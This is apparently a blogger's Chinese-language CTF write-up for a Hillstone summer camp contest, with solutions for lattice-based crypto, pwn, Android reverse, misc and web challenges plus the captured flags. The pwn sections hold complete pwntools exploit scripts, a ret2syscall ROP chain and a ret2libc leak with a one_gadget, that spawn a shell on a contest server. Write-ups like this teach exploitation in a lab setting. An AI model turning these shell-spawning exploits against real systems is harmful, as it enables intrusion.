第三届山石网科夏令营

写在前面

下班之余来打一场炸鱼赛（主要心水小礼品哈哈哈）第一次摸到了第一，我也是网络安全大赛冠军🥵

md 蚌埠住了 冬令营还有保温杯啥的呢！这次居然就给我一本从0到1😅原地送给新生当纪念品了。

Crypto

babyNTRU

格基规约求f和g

p = 18265166690888475568508205788351723108492598063556694453866020018612082716314197018581664220266891343266826262103380794092636040577744226926080805739120171556812778934479727248098841525477772831490126199548545786503110837372880363428957764884329593924744941695642013585909156506088780643030023164855973833306872727463131996134184118614172430586758877233701077685751718260071836310060281140572946121079034501926660471152233585368113925178752435191910762241019003537704885083238106369534830393975302288404167836930602217985985847446070323598776341522649183248452794742376328444827351843724799192817079741161233112260479
h = 4967224096990794383219394548021661512726675694147838134779085870532422860903557980609209611713600051085944165443541629919867486254693404349210710383848787111293470866844887628407505277639836299797939984616893146647351591326606770521678401285613589626410018479980831585926061303904550146343466643582612670862834763887770328979710431031177418547347283523083258882829675470842927115407426622663316454822399636240738287665733629112976904877165355516610469901309760380900426025418466453719738514032928207738877975591007250792160137047114036933809472387873650910438263376962726381797927297555569681381513766206991560665841
c = 16817585342429374146630376920213715475053842668013412994500648477443919828494694587495599063908719008851497141935769861968183626958443589329598781614352147198572062882796132537628308726395654751145080742405050157500585726017502230322869060570158864938641538722583753556090927664838782228764769369834459631417465435803556700281096974029668813698732758153249834904501478272838991307791205987117636747526652824803482977910064904853019629040285700901775083075557874528402638028712625642698991805017963162010854671654728900722088963013805447853328852730983161366447618298248888612010461342887166024478519281752219951330472

K=2**(bits//2-1)
v1 = vector(ZZ, [1, h*K])
v2 = vector(ZZ, [0, p*K])
m = matrix([v1, v2])
f, g = m.LLL()[1]
g = g//K
#print(f,g)

a = f * c % p % g
m = ZZ(c * f % q) * inverse_mod(f, g) % g
print(bytes.fromhex(hex(m)[2:]))

#HSNCTF{d148fc5f-a646-4e60-a739-0bd0be98acd4}

babyHNP

q = 11617715374360202288596693614790746639041280065515420354170463717765818460765992548652144591072405216278802974122732716944329876299701631478958721643071613
A = [11205052163260879279779370027300388478563443748738386851258833175732815177918017923156408522968360233660245388669805196022826655093066229550671451036244177, 4587207419689873871671379475501060352361231709208665709260842495737444139113663532344038909684079685643293993271298355108298467058894209863221986043222103, 10892919356115964033441271848254373740150765391546241788365946905744103719741126554964746464277556730869654695377121263714138165633966013875792234902620232, 10388792144961373833428258161261768867774084238986429927755268743714106636512322654152268221431850066914109192294030406670197964112088034757687400251674294, 11168854651301071762033749829324982832429309270098022559190141243813683288587800229160507152432884446347484607384244984898130514154822876542001332189154040]
b = [206397678313339208910331992242857106765, 248314924649425376092667318144109655550, 116605977425896048557273717492096177262, 130883156720507560420446459921008261211, 254134740809858803078213400623952076908]

a = [ZZ(i*inverse_mod(2**128, q)%q) for i in A]
b = [ZZ(i*inverse_mod(2**128, q)%q) for i in b]

n = 4
L0 = matrix(ZZ, 1, n)
L1 = matrix(ZZ, 1, n)
for i in range(n):
    _a0 = inverse_mod(a[0], q)
    L0[0, i] = ZZ(a[i+1]*_a0%q)
    L1[0, i] = ZZ((b[0]*a[i+1]-b[i+1]*a[0])*_a0%q)
L = block_matrix([
    [1, L0, 0],
    [0, L1, ZZ(q)],
    [0, ZZ(q), 0]
]).LLL()
for row in L:print([_.nbits() for _ in row])
e0 = abs(L[-1][0])
m = ZZ((b[0]+e0)*inverse_mod(a[0], q)%q)
from Crypto.Util.number import *
print(long_to_bytes(int(m)))
# HSNCTF{d05dd7e4-9ee0-4ce1-b358-a4e5209555df}

Pwn

ret2syscall

from pwn import *
from ctypes import *
import os
import base64
context.log_level = 'debug'
context.endian = 'little'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']
sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
rl = lambda s = False : sh.recvline(s)
ti = lambda : sh.interactive()

sh = process('./pwn')
sh = remote('58.240.236.231', 49003)
syscall = 0x0000000000400741
pop_rdi = 0x000000000040072b
pop_rsi = 0x0000000000400735
pop_rdx = 0x000000000040073f
pop_rax = 0x0000000000400721

rop = p64(pop_rax) + p64(59)
rop += p64(pop_rdi) + p64(0x0000000000601048)
rop += p64(pop_rsi) + p64(0)
rop += p64(pop_rdx) + p64(0)
rop += p64(syscall)

sla('input:', 'a'*0x48 + rop)

ti()

ret2libc

from pwn import *
from ctypes import *
import os
import base64
context.log_level = 'debug'
context.endian = 'little'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']
sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
rl = lambda s = False : sh.recvline(s)
ti = lambda : sh.interactive()

sh = process('./pwn')
libc = ELF('/home/ccc/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
sh = remote('58.240.236.231', 49002)
pop_rdi = 0x0000000000400783
pop_rsi2 = 0x0000000000400781
main = 0x0000000004006FD
leak = 'a'*0xd8 + p64(pop_rdi) + p64(0x0000000000601018) + p64(0x0000000000400520) + p64(main)
sla('name:', leak)

libc_base = u64(ru('\x7f')[-6:].ljust(8, '\0')) - libc.sym['puts']
print hex(libc_base)
og = libc_base + 0xf1247
'''

0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
'''
payload = 'a'*0xd8 + p64(og)
sla('name:', payload)
ti()

Reverse

HSAndroid1

还以为和冬令营一模一样的题，结果看错了对象。上面的混淆运算才是flag

chatGPT写个脚本完事。

charArr = list("0db530c0e9752357b1ae4cf7ea8331ae")

for i in range(14, 0, -2):
    for j in range(12, 0, -4):
        temp = charArr[j]
        charArr[j] = charArr[j - 4]
        charArr[j - 4] = temp

    
    temp2 = charArr[i - 1]
    charArr[i - 1] = charArr[i - 2]
    charArr[i - 2] = temp2

original_string = "".join(charArr)
print("Original String:", original_string)

#hsnctf{d35b300c92570e57b1ae4cf7ea8331ae}

Misc

签到题

这个没什么好说的。

easyusb

板子题 注意有[CAPS] 所以解压密码为全大写 解开压缩包就是flag

Web

三个原题，一个不咋会web的人拿了三个前三血

primitive

今年冬令营一模一样的题 参考我自己的博客

https://g1at.github.io/2023/02/06/2023%E5%B1%B1%E7%9F%B3%E5%86%AC%E4%BB%A4%E8%90%A5/#Primitive-php

git

[BJDCTF2020]原题，你猜我怎么找到的，Google识图😂

https://www.jianshu.com/p/7092f56dcbbc

uns

CTFshow原题 唯一变化就是admin.php改成了session.php

https://blog.csdn.net/Kracxi/article/details/122885954